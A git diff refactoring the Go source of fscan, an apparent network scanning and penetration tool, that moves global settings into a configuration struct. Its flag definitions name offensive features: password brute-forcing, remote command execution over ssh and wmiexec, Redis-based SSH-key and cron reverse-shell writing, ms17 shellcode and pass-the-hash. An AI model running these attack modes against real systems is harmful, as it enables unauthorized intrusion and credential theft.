WebScan(info *common.HostInfo) { - once.Do(initpoc) - var pocinfo = common.Pocinfo +func WebScan(info common.HostInfo, flags common.Flags) { + once.Do(func() { initpoc(flags.PocPath) }) + var pocinfo = flags.Pocinfo buf := strings.Split(info.Url, "/") pocinfo.Target = strings.Join(buf[:3], "/") if pocinfo.PocName != "" { - Execute(pocinfo) + Execute(pocinfo, flags) } else { for _, infostr := range info.Infostr { pocinfo.PocName = lib.CheckInfoPoc(infostr) - Execute(pocinfo) + Execute(pocinfo, flags) } } } -func Execute(PocInfo common.PocInfo) { +func Execute(PocInfo common.PocInfo, flags common.Flags) { req, err := http.NewRequest("GET", PocInfo.Target, nil) if err != nil { errlog := fmt.Sprintf("[-] webpocinit %v %v", PocInfo.Target, err) @@ -48,11 +49,11 @@ func Execute(PocInfo common.PocInfo) { } req.Header.Set("Connection", "close") pocs := filterPoc(PocInfo.PocName) - lib.CheckMultiPoc(req, pocs, common.PocNum) + lib.CheckMultiPoc(req, pocs, flags) } -func initpoc() { - if common.PocPath == "" { +func initpoc(pocPath string) { + if pocPath == "" { entries, err := Pocs.ReadDir("pocs") if err != nil { fmt.Printf("[-] init poc error: %v", err) @@ -67,7 +68,7 @@ func initpoc() { } } } else { - err := filepath.Walk(common.PocPath, + err := filepath.Walk(pocPath, func(path string, info os.FileInfo, err error) error { if err != nil || info == nil { return err diff --git a/WebScan/lib/check.go b/WebScan/lib/check.go index 5ac0175..1b72eca 100644 --- a/WebScan/lib/check.go +++ b/WebScan/lib/check.go @@ -3,9 +3,6 @@ package lib import ( "crypto/md5" "fmt" - "github.com/google/cel-go/cel" - "github.com/shadow1ng/fscan/WebScan/info" - "github.com/shadow1ng/fscan/common" "math/rand" "net/http" "net/url" @@ -13,6 +10,10 @@ import ( "strings" "sync" "time" + + "github.com/google/cel-go/cel" + "github.com/shadow1ng/fscan/WebScan/info" + "github.com/shadow1ng/fscan/common" ) var ( @@ -25,13 +26,13 @@ type Task struct { Poc *Poc } -func CheckMultiPoc(req *http.Request, pocs []*Poc, workers int) { +func CheckMultiPoc(req *http.Request, pocs []*Poc, flags common.Flags) { tasks := make(chan Task) var wg sync.WaitGroup - for i := 0; i < workers; i++ { + for i := 0; i < flags.PocNum; i++ { go func() { for task := range tasks { - isVul, _, name := executePoc(task.Req, task.Poc) + isVul, _, name := executePoc(task.Req, task.Poc, flags) if isVul { result := fmt.Sprintf("[+] %s %s %s", task.Req.URL, task.Poc.Name, name) common.LogSuccess(result) @@ -52,7 +53,7 @@ func CheckMultiPoc(req *http.Request, pocs []*Poc, workers int) { close(tasks) } -func executePoc(oReq *http.Request, p *Poc) (bool, error, string) { +func executePoc(oReq *http.Request, p *Poc, flags common.Flags) (bool, error, string) { c := NewEnvOption() c.UpdateCompileOptions(p.Set) if len(p.Sets) > 0 { @@ -82,7 +83,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) { for _, item := range p.Set { k, expression := item.Key, item.Value if expression == "newReverse()" { - if !common.DnsLog { + if !flags.DnsLog { return false, nil, "" } variableMap[k] = newReverse() @@ -96,7 +97,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) { success := false //爆破模式,比如tomcat弱口令 if len(p.Sets) > 0 { - success, err = clusterpoc(oReq, p, variableMap, req, env) + success, err = clusterpoc(oReq, p, flags.PocFull, variableMap, req, env) return success, nil, "" } @@ -257,7 +258,7 @@ func newReverse() *Reverse { } } -func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{}, req *Request, env *cel.Env) (success bool, err error) { +func clusterpoc(oReq *http.Request, p *Poc, pocFull bool, variableMap map[string]interface{}, req *Request, env *cel.Env) (success bool, err error) { var strMap StrMap var tmpnum int for i, rule := range p.Rules { @@ -276,8 +277,8 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{}, ruleHash := make(map[string]struct{}) look: for j, item := range setsMap { - //shiro默认只跑10key - if p.Name == "poc-yaml-shiro-key" && !common.PocFull && j >= 10 { + //shiro only runs by default 10key + if p.Name == "poc-yaml-shiro-key" && !pocFull && j >= 10 { if item[1] == "cbc" { continue } else { diff --git a/WebScan/lib/client.go b/WebScan/lib/client.go index c7f82b9..985ce98 100644 --- a/WebScan/lib/client.go +++ b/WebScan/lib/client.go @@ -6,9 +6,6 @@ import ( "embed" "errors" "fmt" - "github.com/shadow1ng/fscan/common" - "golang.org/x/net/proxy" - "gopkg.in/yaml.v2" "io/ioutil" "log" "net" @@ -16,6 +13,10 @@ import ( "net/url" "strings" "time" + + "github.com/shadow1ng/fscan/common" + "golang.org/x/net/proxy" + "gopkg.in/yaml.v2" ) var ( @@ -25,15 +26,15 @@ var ( keepAlive = 5 * time.Second ) -func Inithttp(PocInfo common.PocInfo) { +func Inithttp(flags common.Flags) { //PocInfo.Proxy = "http://127.0.0.1:8080" - err := InitHttpClient(common.PocNum, common.Proxy, time.Duration(common.WebTimeout)*time.Second) + err := InitHttpClient(flags.PocNum, flags.Proxy, common.Socks5{Address: flags.Socks5Proxy}, time.Duration(flags.WebTimeout)*time.Second) if err != nil { log.Fatal(err) } } -func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) error { +func InitHttpClient(ThreadsNum int, DownProxy string, socks5Proxy common.Socks5, Timeout time.Duration) error { type DialContext = func(ctx context.Context, network, addr string) (net.Conn, error) dialer := &net.Dialer{ Timeout: dialTimout, @@ -51,8 +52,8 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err DisableKeepAlives: false, } - if common.Socks5Proxy != "" { - dialSocksProxy, err := common.Socks5Dailer(dialer) + if socks5Proxy.Address != "" { + dialSocksProxy, err := common.Socks5Dailer(dialer, socks5Proxy) if err != nil { return err } diff --git a/common/Parse.go b/common/Parse.go index 886601c..32ef9c5 100644 --- a/common/Parse.go +++ b/common/Parse.go @@ -11,24 +11,28 @@ import ( "strings" ) -func Parse(Info *HostInfo) { - ParseUser() - ParsePass(Info) - ParseInput(Info) - ParseScantype(Info) +func Parse(inputConfig *InConfig) { + ParseUser(&inputConfig.Flags) + ParsePass(&inputConfig.HostInfo, &inputConfig.Flags) + ParseInput(&inputConfig.HostInfo, &inputConfig.Flags) + ParseScantype(&inputConfig.HostInfo, &inputConfig.Flags) + + Outputfile = inputConfig.LogConfig.Outputfile + IsSave = !inputConfig.LogConfig.TmpSave + Cookie = inputConfig.Cookie } -func ParseUser() { - if Username == "" && Userfile == "" { +func ParseUser(flags *Flags) { + if flags.Username == "" && flags.Userfile == "" { return } var Usernames []string - if Username != "" { - Usernames = strings.Split(Username, ",") + if flags.Username != "" { + Usernames = strings.Split(flags.Username, ",") } - if Userfile != "" { - users, err := Readfile(Userfile) + if flags.Userfile != "" { + users, err := Readfile(flags.Userfile) if err == nil { for _, user := range users { if user != "" { @@ -44,10 +48,10 @@ func ParseUser() { } } -func ParsePass(Info *HostInfo) { +func ParsePass(Info *HostInfo, flags *Flags) { var PwdList []string - if Password != "" { - passs := strings.Split(Password, ",") + if flags.Password != "" { + passs := strings.Split(flags.Password, ",") for _, pass := range passs { if pass != "" { PwdList = append(PwdList, pass) @@ -55,8 +59,8 @@ func ParsePass(Info *HostInfo) { } Passwords = PwdList } - if Passfile != "" { - passs, err := Readfile(Passfile) + if flags.Passfile != "" { + passs, err := Readfile(flags.Passfile) if err == nil { for _, pass := range passs { if pass != "" { @@ -66,34 +70,35 @@ func ParsePass(Info *HostInfo) { Passwords = PwdList } } - if URL != "" { - urls := strings.Split(URL, ",") + + if flags.URL != "" { + urls := strings.Split(flags.URL, ",") TmpUrls := make(map[string]struct{}) for _, url := range urls { if _, ok := TmpUrls[url]; !ok { TmpUrls[url] = struct{}{} if url != "" { - Urls = append(Urls, url) + flags.Urls = append(flags.Urls, url) } } } } - if UrlFile != "" { - urls, err := Readfile(UrlFile) + if flags.UrlFile != "" { + urls, err := Readfile(flags.UrlFile) if err == nil { TmpUrls := make(map[string]struct{}) for _, url := range urls { if _, ok := TmpUrls[url]; !ok { TmpUrls[url] = struct{}{} if url != "" { - Urls = append(Urls, url) + flags.Urls = append(flags.Urls, url) } } } } } - if PortFile != "" { - ports, err := Readfile(PortFile) + if flags.PortFile != "" { + ports, err := Readfile(flags.PortFile) if err == nil { newport := "" for _, port := range ports { @@ -125,88 +130,84 @@ func Readfile(filename string) ([]string, error) { return content, nil } -func ParseInput(Info *HostInfo) { - if Info.Host == "" && HostFile == "" && URL == "" && UrlFile == "" { +func ParseInput(Info *HostInfo, flags *Flags) { + if Info.Host == "" && flags.HostFile == "" && flags.URL == "" && flags.UrlFile == "" { fmt.Println("Host is none") flag.Usage() os.Exit(0) } - if BruteThread <= 0 { - BruteThread = 1 - } - - if TmpSave == true { - IsSave = false + if flags.BruteThread <= 0 { + flags.BruteThread = 1 } if Info.Ports == DefaultPorts { Info.Ports += "," + Webport } - if PortAdd != "" { + if flags.PortAdd != "" { if strings.HasSuffix(Info.Ports, ",") { - Info.Ports += PortAdd + Info.Ports += flags.PortAdd } else { - Info.Ports += "," + PortAdd + Info.Ports += "," + flags.PortAdd } } - if UserAdd != "" { - user := strings.Split(UserAdd, ",") + if flags.UserAdd != "" { + user := strings.Split(flags.UserAdd, ",") for a := range Userdict { Userdict[a] = append(Userdict[a], user...) Userdict[a] = RemoveDuplicate(Userdict[a]) } } - if PassAdd != "" { - pass := strings.Split(PassAdd, ",") + if flags.PassAdd != "" { + pass := strings.Split(flags.PassAdd, ",") Passwords = append(Passwords, pass...) Passwords = RemoveDuplicate(Passwords) } - if Socks5Proxy != "" && !strings.HasPrefix(Socks5Proxy, "socks5://") { - if !strings.Contains(Socks5Proxy, ":") { - Socks5Proxy = "socks5://127.0.0.1" + Socks5Proxy + if flags.Socks5Proxy != "" && !strings.HasPrefix(flags.Socks5Proxy, "socks5://") { + if !strings.Contains(flags.Socks5Proxy, ":") { + flags.Socks5Proxy = "socks5://127.0.0.1" + flags.Socks5Proxy } else { - Socks5Proxy = "socks5://" + Socks5Proxy + flags.Socks5Proxy = "socks5://" + flags.Socks5Proxy } } - if Socks5Proxy != "" { - fmt.Println("Socks5Proxy:", Socks5Proxy) - _, err := url.Parse(Socks5Proxy) + if flags.Socks5Proxy != "" { + fmt.Println("Socks5Proxy:", flags.Socks5Proxy) + _, err := url.Parse(flags.Socks5Proxy) if err != nil { fmt.Println("Socks5Proxy parse error:", err) os.Exit(0) } - NoPing = true + flags.NoPing = true } - if Proxy != "" { - if Proxy == "1" { - Proxy = "http://127.0.0.1:8080" - } else if Proxy == "2" { - Proxy = "socks5://127.0.0.1:1080" - } else if !strings.Contains(Proxy, "://") { - Proxy = "http://127.0.0.1:" + Proxy + if flags.Proxy != "" { + if flags.Proxy == "1" { + flags.Proxy = "http://127.0.0.1:8080" + } else if flags.Proxy == "2" { + flags.Proxy = "socks5://127.0.0.1:1080" + } else if !strings.Contains(flags.Proxy, "://") { + flags.Proxy = "http://127.0.0.1:" + flags.Proxy } - fmt.Println("Proxy:", Proxy) - if !strings.HasPrefix(Proxy, "socks") && !strings.HasPrefix(Proxy, "http") { + fmt.Println("Proxy:", flags.Proxy) + if !strings.HasPrefix(flags.Proxy, "socks") && !strings.HasPrefix(flags.Proxy, "http") { fmt.Println("no support this proxy") os.Exit(0) } - _, err := url.Parse(Proxy) + _, err := url.Parse(flags.Proxy) if err != nil { fmt.Println("Proxy parse error:", err) os.Exit(0) } } - if Hash != "" && len(Hash) != 32 { + if flags.Hash != "" && len(flags.Hash) != 32 { fmt.Println("[-] Hash is error,len(hash) must be 32") os.Exit(0) } else { var err error - HashBytes, err = hex.DecodeString(Hash) + flags.HashBytes, err = hex.DecodeString(flags.Hash) if err != nil { fmt.Println("[-] Hash is error,hex decode error") os.Exit(0) @@ -214,13 +215,13 @@ func ParseInput(Info *HostInfo) { } } -func ParseScantype(Info *HostInfo) { - _, ok := PORTList[Scantype] +func ParseScantype(Info *HostInfo, flags *Flags) { + _, ok := PORTList[flags.Scantype] if !ok { showmode() } - if Scantype != "all" && Info.Ports == DefaultPorts+","+Webport { - switch Scantype { + if flags.Scantype != "all" && Info.Ports == DefaultPorts+","+Webport { + switch flags.Scantype { case "wmiexec": Info.Ports = "135" case "wmiinfo": @@ -244,10 +245,10 @@ func ParseScantype(Info *HostInfo) { case "main": Info.Ports = DefaultPorts default: - port, _ := PORTList[Scantype] + port, _ := PORTList[flags.Scantype] Info.Ports = strconv.Itoa(port) } - fmt.Println("-m ", Scantype, " start scan the port:", Info.Ports) + fmt.Println("-m ", flags.Scantype, " start scan the port:", Info.Ports) } } diff --git a/common/ParseIP.go b/common/ParseIP.go index acb1c8b..17ddbc2 100644 --- a/common/ParseIP.go +++ b/common/ParseIP.go @@ -23,11 +23,11 @@ var ParseIPErr = errors.New(" host parsing error\n" + "192.168.1.1-192.168.255.255\n" + "192.168.1.1-255") -func ParseIP(host string, filename string, nohosts ...string) (hosts []string, err error) { +func ParseIP(hostPort *[]string, host string, filename string, nohosts ...string) (hosts []string, err error) { hosts = ParseIPs(host) if filename != "" { var filehost []string - filehost, _ = Readipfile(filename) + filehost, _ = readipfile(hostPort, filename) hosts = append(hosts, filehost...) } @@ -55,7 +55,7 @@ func ParseIP(host string, filename string, nohosts ...string) (hosts []string, e } } hosts = RemoveDuplicate(hosts) - if len(hosts) == 0 && len(HostPort) == 0 && host != "" && filename != "" { + if len(hosts) == 0 && len(*hostPort) == 0 && host != "" && filename != "" { err = ParseIPErr } return @@ -115,7 +115,8 @@ func parseIP2(host string) (hosts []string) { } // 解析ip段: 192.168.111.1-255 -// 192.168.111.1-192.168.112.255 +// +// 192.168.111.1-192.168.112.255 func parseIP1(ip string) []string { IPRange := strings.Split(ip, "-") testIP := net.ParseIP(IPRange[0]) @@ -175,19 +176,22 @@ func IPRange(c *net.IPNet) string { } // 按行读ip -func Readipfile(filename string) ([]string, error) { +func readipfile(hostPort *[]string, filename string) ([]string, error) { file, err := os.Open(filename) if err != nil { fmt.Printf("Open %s error, %v", filename, err) os.Exit(0) } defer file.Close() - var content []string + scanner := bufio.NewScanner(file) scanner.Split(bufio.ScanLines) + + var content []string for scanner.Scan() { line := strings.TrimSpace(scanner.Text()) if line != "" { + var hosts []string text := strings.Split(line, ":") if len(text) == 2 { port := strings.Split(text[1], " ")[0] @@ -195,14 +199,14 @@ func Readipfile(filename string) ([]string, error) { if err != nil || (num < 1 || num > 65535) { continue } - hosts := ParseIPs(text[0]) + hosts = ParseIPs(text[0]) for _, host := range hosts { - HostPort = append(HostPort, fmt.Sprintf("%s:%s", host, port)) + *hostPort = append(*hostPort, fmt.Sprintf("%s:%s", host, port)) } } else { - host := ParseIPs(line) - content = append(content, host...) + hosts = ParseIPs(line) } + content = append(content, hosts...) } } return content, nil diff --git a/common/config.go b/common/config.go index a35cac7..d60e9e0 100644 --- a/common/config.go +++ b/common/config.go @@ -41,16 +41,16 @@ var PORTList = map[string]int{ "main": 0, } -var Outputfile = "result.txt" var IsSave = true var Webport = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880" var DefaultPorts = "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017" type HostInfo struct { - Host string - Ports string - Url string - Infostr []string + Host string + Ports string + Url string + Infostr []string + HostPort []string // locks like dead varibale, I cannot file initialization of this variable } type PocInfo struct { @@ -59,12 +59,7 @@ type PocInfo struct { } var ( - UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" - Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" - DnsLog bool - PocNum int - PocFull bool - CeyeDomain string - ApiKey string - Cookie string + UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" + Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" + Cookie string ) diff --git a/common/flag.go b/common/flag.go index 8961b0a..a2b120d 100644 --- a/common/flag.go +++ b/common/flag.go @@ -4,7 +4,8 @@ import ( "flag" ) -var ( +// todo make function +type Flags struct { Path string Scantype string Command string @@ -13,9 +14,8 @@ var ( Username string Password string Proxy string - Timeout int64 = 3 - WebTimeout int64 = 5 - TmpSave bool + Timeout int64 + WebTimeout int64 NoPing bool Ping bool Pocinfo PocInfo @@ -43,56 +43,77 @@ var ( Socks5Proxy string Hash string HashBytes []byte - HostPort []string IsWmi bool -) + PocNum int + PocFull bool + DnsLog bool +} + +// todo make function +type LogConfig struct { + Silent bool + Outputfile string + TmpSave bool + WaitTime int64 +} + +type InConfig struct { + HostInfo HostInfo + Flags Flags + LogConfig LogConfig + Cookie string +} + +func Flag(inConfig *InConfig) { + flag.StringVar(&inConfig.HostInfo.Host, "h", "", "IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12") + flag.StringVar(&inConfig.HostInfo.Ports, "p", DefaultPorts, "Select a port,for example: 22 | 1-65535 | 22,80,3306") + + flag.StringVar(&inConfig.Flags.NoHosts, "hn", "", "the hosts no scan,as: -hn 192.168.1.1/24") + flag.StringVar(&inConfig.Flags.PortAdd, "pa", "", "add port base DefaultPorts,-pa 3389") + flag.StringVar(&inConfig.Flags.UserAdd, "usera", "", "add a user base DefaultUsers,-usera user") + flag.StringVar(&inConfig.Flags.PassAdd, "pwda", "", "add a password base DefaultPasses,-pwda password") + flag.StringVar(&inConfig.Flags.NoPorts, "pn", "", "the ports no scan,as: -pn 445") + flag.StringVar(&inConfig.Flags.Command, "c", "", "exec command (ssh|wmiexec)") + flag.StringVar(&inConfig.Flags.SshKey, "sshkey", "", "sshkey file (id_rsa)") + flag.StringVar(&inConfig.Flags.Domain, "domain", "", "smb domain") + flag.StringVar(&inConfig.Flags.Username, "user", "", "username") + flag.StringVar(&inConfig.Flags.Password, "pwd", "", "password") + flag.Int64Var(&inConfig.Flags.Timeout, "time", 3, "Set timeout") + flag.Int64Var(&inConfig.Flags.WebTimeout, "wt", 5, "Set web timeout") + flag.StringVar(&inConfig.Flags.Scantype, "m", "all", "Select scan type ,as: -m ssh") + flag.StringVar(&inConfig.Flags.Path, "path", "", "fcgi、smb romote file path") + flag.IntVar(&inConfig.Flags.Threads, "t", 600, "Thread nums") + flag.IntVar(&inConfig.Flags.LiveTop, "top", 10, "show live len top") + flag.StringVar(&inConfig.Flags.HostFile, "hf", "", "host file, -hf ip.txt") + flag.StringVar(&inConfig.Flags.Userfile, "userf", "", "username file") + flag.StringVar(&inConfig.Flags.Passfile, "pwdf", "", "password file") + flag.StringVar(&inConfig.Flags.PortFile, "portf", "", "Port File") + flag.StringVar(&inConfig.Flags.PocPath, "pocpath", "", "poc file path") + flag.StringVar(&inConfig.Flags.RedisFile, "rf", "", "redis file to write sshkey file (as: -rf id_rsa.pub) ") + flag.StringVar(&inConfig.Flags.RedisShell, "rs", "", "redis shell to write cron file (as: -rs 192.168.1.1:6666) ") + flag.BoolVar(&inConfig.Flags.IsWebCan, "nopoc", false, "not to scan web vul") + flag.BoolVar(&inConfig.Flags.IsBrute, "nobr", false, "not to Brute password") + flag.IntVar(&inConfig.Flags.BruteThread, "br", 1, "Brute threads") + flag.BoolVar(&inConfig.Flags.NoPing, "np", false, "not to ping") + flag.BoolVar(&inConfig.Flags.Ping, "ping", false, "using ping replace icmp") + flag.StringVar(&inConfig.Flags.URL, "u", "", "url") + flag.StringVar(&inConfig.Flags.UrlFile, "uf", "", "urlfile") + flag.StringVar(&inConfig.Flags.Pocinfo.PocName, "pocname", "", "use the pocs these contain pocname, -pocname weblogic") + flag.IntVar(&inConfig.Flags.PocNum, "num", 20, "poc rate") + flag.StringVar(&inConfig.Flags.Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080") + flag.StringVar(&inConfig.Flags.Socks5Proxy, "socks5", "", "set socks5 proxy, will be used in tcp connection, timeout setting will not work") + flag.StringVar(&inConfig.Flags.SC, "sc", "", "ms17 shellcode,as -sc add") + flag.BoolVar(&inConfig.Flags.IsWmi, "wmi", false, "start wmi") + flag.StringVar(&inConfig.Flags.Hash, "hash", "", "hash") + flag.BoolVar(&inConfig.Flags.PocFull, "full", false, "poc full scan,as: shiro 100 key") + flag.BoolVar(&inConfig.Flags.DnsLog, "dns", false, "using dnslog poc") + + flag.StringVar(&inConfig.LogConfig.Outputfile, "o", "result.txt", "Outputfile") + flag.BoolVar(&inConfig.LogConfig.TmpSave, "no", false, "not to save output log") + flag.Int64Var(&inConfig.LogConfig.WaitTime, "debug", 60, "every time to LogErr") + flag.BoolVar(&inConfig.LogConfig.Silent, "silent", false, "silent scan") + + flag.StringVar(&inConfig.Cookie, "cookie", "", "set poc cookie,-cookie rememberMe=login") -func Flag(Info *HostInfo) { - flag.StringVar(&Info.Host, "h", "", "IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12") - flag.StringVar(&NoHosts, "hn", "", "the hosts no scan,as: -hn 192.168.1.1/24") - flag.StringVar(&Info.Ports, "p", DefaultPorts, "Select a port,for example: 22 | 1-65535 | 22,80,3306") - flag.StringVar(&PortAdd, "pa", "", "add port base DefaultPorts,-pa 3389") - flag.StringVar(&UserAdd, "usera", "", "add a user base DefaultUsers,-usera user") - flag.StringVar(&PassAdd, "pwda", "", "add a password base DefaultPasses,-pwda password") - flag.StringVar(&NoPorts, "pn", "", "the ports no scan,as: -pn 445") - flag.StringVar(&Command, "c", "", "exec command (ssh|wmiexec)") - flag.StringVar(&SshKey, "sshkey", "", "sshkey file (id_rsa)") - flag.StringVar(&Domain, "domain", "", "smb domain") - flag.StringVar(&Username, "user", "", "username") - flag.StringVar(&Password, "pwd", "", "password") - flag.Int64Var(&Timeout, "time", 3, "Set timeout") - flag.StringVar(&Scantype, "m", "all", "Select scan type ,as: -m ssh") - flag.StringVar(&Path, "path", "", "fcgi、smb romote file path") - flag.IntVar(&Threads, "t", 600, "Thread nums") - flag.IntVar(&LiveTop, "top", 10, "show live len top") - flag.StringVar(&HostFile, "hf", "", "host file, -hf ip.txt") - flag.StringVar(&Userfile, "userf", "", "username file") - flag.StringVar(&Passfile, "pwdf", "", "password file") - flag.StringVar(&PortFile, "portf", "", "Port File") - flag.StringVar(&PocPath, "pocpath", "", "poc file path") - flag.StringVar(&RedisFile, "rf", "", "redis file to write sshkey file (as: -rf id_rsa.pub) ") - flag.StringVar(&RedisShell, "rs", "", "redis shell to write cron file (as: -rs 192.168.1.1:6666) ") - flag.BoolVar(&IsWebCan, "nopoc", false, "not to scan web vul") - flag.BoolVar(&IsBrute, "nobr", false, "not to Brute password") - flag.IntVar(&BruteThread, "br", 1, "Brute threads") - flag.BoolVar(&NoPing, "np", false, "not to ping") - flag.BoolVar(&Ping, "ping", false, "using ping replace icmp") - flag.StringVar(&Outputfile, "o", "result.txt", "Outputfile") - flag.BoolVar(&TmpSave, "no", false, "not to save output log") - flag.Int64Var(&WaitTime, "debug", 60, "every time to LogErr") - flag.BoolVar(&Silent, "silent", false, "silent scan") - flag.BoolVar(&PocFull, "full", false, "poc full scan,as: shiro 100 key") - flag.StringVar(&URL, "u", "", "url") - flag.StringVar(&UrlFile, "uf", "", "urlfile") - flag.StringVar(&Pocinfo.PocName, "pocname", "", "use the pocs these contain pocname, -pocname weblogic") - flag.StringVar(&Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080") - flag.StringVar(&Socks5Proxy, "socks5", "", "set socks5 proxy, will be used in tcp connection, timeout setting will not work") - flag.StringVar(&Cookie, "cookie", "", "set poc cookie,-cookie rememberMe=login") - flag.Int64Var(&WebTimeout, "wt", 5, "Set web timeout") - flag.BoolVar(&DnsLog, "dns", false, "using dnslog poc") - flag.IntVar(&PocNum, "num", 20, "poc rate") - flag.StringVar(&SC, "sc", "", "ms17 shellcode,as -sc add") - flag.BoolVar(&IsWmi, "wmi", false, "start wmi") - flag.StringVar(&Hash, "hash", "", "hash") flag.Parse() } diff --git a/common/log.go b/common/log.go index 574dba7..5b67c3f 100644 --- a/common/log.go +++ b/common/log.go @@ -17,6 +17,7 @@ var LogErrTime int64 var WaitTime int64 var Silent bool var LogWG sync.WaitGroup +var Outputfile string func init() { LogSucTime = time.Now().Unix() @@ -57,9 +58,9 @@ func WriteFile(result string, filename string) { func LogError(errinfo interface{}) { if WaitTime == 0 { - fmt.Printf("已完成 %v/%v %v \n", End, Num, errinfo) + fmt.Printf("completed %v/%v %v \n", End, Num, errinfo) } else if (time.Now().Unix()-LogSucTime) > WaitTime && (time.Now().Unix()-LogErrTime) > WaitTime { - fmt.Printf("已完成 %v/%v %v \n", End, Num, errinfo) + fmt.Printf("completed %v/%v %v \n", End, Num, errinfo) LogErrTime = time.Now().Unix() } } diff --git a/common/proxy.go b/common/proxy.go index 468a000..e51f10d 100644 --- a/common/proxy.go +++ b/common/proxy.go @@ -2,43 +2,47 @@ package common import ( "errors" - "golang.org/x/net/proxy" "net" "net/url" "strings" "time" + + "golang.org/x/net/proxy" ) -func WrapperTcpWithTimeout(network, address string, timeout time.Duration) (net.Conn, error) { - d := &net.Dialer{Timeout: timeout} - return WrapperTCP(network, address, d) +type Socks5 struct { + Address string } -func WrapperTCP(network, address string,forward * net.Dialer) (net.Conn, error) { +func WrapperTcpWithTimeout(network, address string, socks5Proxy Socks5, timeout time.Duration) (net.Conn, error) { + d := &net.Dialer{Timeout: timeout} + return WrapperTCP(network, address, socks5Proxy, d) +} + +func WrapperTCP(network, address string, socks5Proxy Socks5, forward *net.Dialer) (net.Conn, error) { //get conn var conn net.Conn - if Socks5Proxy == "" { + if socks5Proxy.Address == "" { var err error - conn,err = forward.Dial(network, address) + conn, err = forward.Dial(network, address) if err != nil { return nil, err } - }else { - dailer, err := Socks5Dailer(forward) - if err != nil{ + } else { + dailer, err := Socks5Dailer(forward, socks5Proxy) + if err != nil { return nil, err } - conn,err = dailer.Dial(network, address) + conn, err = dailer.Dial(network, address) if err != nil { return nil, err } } return conn, nil - } -func Socks5Dailer(forward * net.Dialer) (proxy.Dialer, error) { - u,err := url.Parse(Socks5Proxy) +func Socks5Dailer(forward *net.Dialer, socks5Proxy Socks5) (proxy.Dialer, error) { + u, err := url.Parse(socks5Proxy.Address) if err != nil { return nil, err } @@ -51,10 +55,10 @@ func Socks5Dailer(forward * net.Dialer) (proxy.Dialer, error) { if u.User.String() != "" { auth = proxy.Auth{} auth.User = u.User.Username() - password,_ := u.User.Password() + password, _ := u.User.Password() auth.Password = password dailer, err = proxy.SOCKS5("tcp", address, &auth, forward) - }else { + } else { dailer, err = proxy.SOCKS5("tcp", address, nil, forward) }